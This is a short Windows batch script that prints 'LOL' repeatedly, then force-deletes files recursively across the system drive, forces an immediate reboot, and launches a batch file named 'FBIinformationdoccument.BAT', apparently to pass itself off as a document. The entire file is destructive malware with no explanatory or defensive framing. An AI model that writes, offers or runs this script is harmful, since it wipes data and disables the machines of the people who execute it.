@echo off
echo LOL
echo LOL
echo LOL
echo LOL
echo LOL
echo LOL
echo LOL
echo LOL
echo LOL
echo LOL
echo LOL
echo LOL
echo LOL
echo LOL
echo LOL
echo LOL
echo LOL
echo LOL
echo LOL
echo LOL
echo LOL
echo LOL
echo LOL
echo LOL
echo LOL
echo LOL
echo LOL
echo LOL
echo LOL
echo LOL
echo LOL
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
cmd /k FBIinformationdoccument.BAT
pause